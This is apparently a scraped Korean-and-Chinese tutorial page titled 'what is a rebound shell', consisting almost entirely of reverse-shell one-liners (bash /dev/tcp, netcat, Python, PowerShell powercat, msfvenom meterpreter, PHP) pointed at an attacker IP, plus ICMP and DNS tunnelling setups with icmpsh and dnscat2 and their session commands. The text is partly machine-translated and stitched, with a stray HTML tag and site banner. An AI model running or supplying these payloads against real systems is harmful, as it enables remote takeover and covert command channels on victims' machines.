bash -i >& /dev/tcp/ip_address/port 0>&1
nc -e /bin/sh 192.168.2.130 4444
import socket,subprocess,os s =socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(( "192.168.2.130" , 4444 )) os.dup2(s.fileno(), 0 ) os.dup2(s.fileno(), 1 ) os.dup2(s.fileno(), 2 ) p = subprocess.call([ "/bin/bash" , "-i" ])
Import-Module .\powercat.ps1 powercat -c 192.168.2.130 -p 4444 -e cmd.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i &3 2>&3");'
关闭icmp响应,不然shell一直跳,恢复是0 sysctl -w net.ipv4.icmp_echo_ignore_all=1 python icmpsh_m.py 源 目标 python icmpsh_m.py 192.168.2.137 192.168.2.135
windows7에서 실행:
icmpsh.exe -t 192.168.2.137
https://downloads.skullsecurity.org/d nscat2/
여기에서 다운로드한 dnscat2를 사용합니다. dnscat2는 Windows 및 Linux 버전, 서버 및 클라이언트로 구분됩니다.
그리고 컴파일하려면 vs2008을 사용하는 것이 좋습니다
git clone https://github.com/iagox86/dnscat2.git cd dnscat2 cd server sudo gem install bundler bundle install sudo ruby ./dnscat2.rb
ruby dnscat2.rb --dns host=0.0.0.0,port=53531 ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥) ruby dnscat2.rb xxx.com
windows7:
./dnscat --dns server=192.168.2.130,port=53531 ./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥) ./dnscat xxx.com
quit (退出控制台) kill <id> (中断通道) set(设值,比如设置security=open) windows(列举出所有的通道) window -i <id>(连接某个通道) 连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令): clear(清屏) delay(修改远程会话超时时间) exec(执行远程机上的程序) shell(得到一个反弹shell) download/upload(两端之间上传下载文件) supend(返回到上一层,等于快捷键ctrl+z)</id></id>
listen 127.0.0.1:6666 192.168.2.135:80 本机的6666就可以访问80端口
위 내용은 리바운드 쉘은 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
![[웹 프런트엔드] Node.js 빠른 시작](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
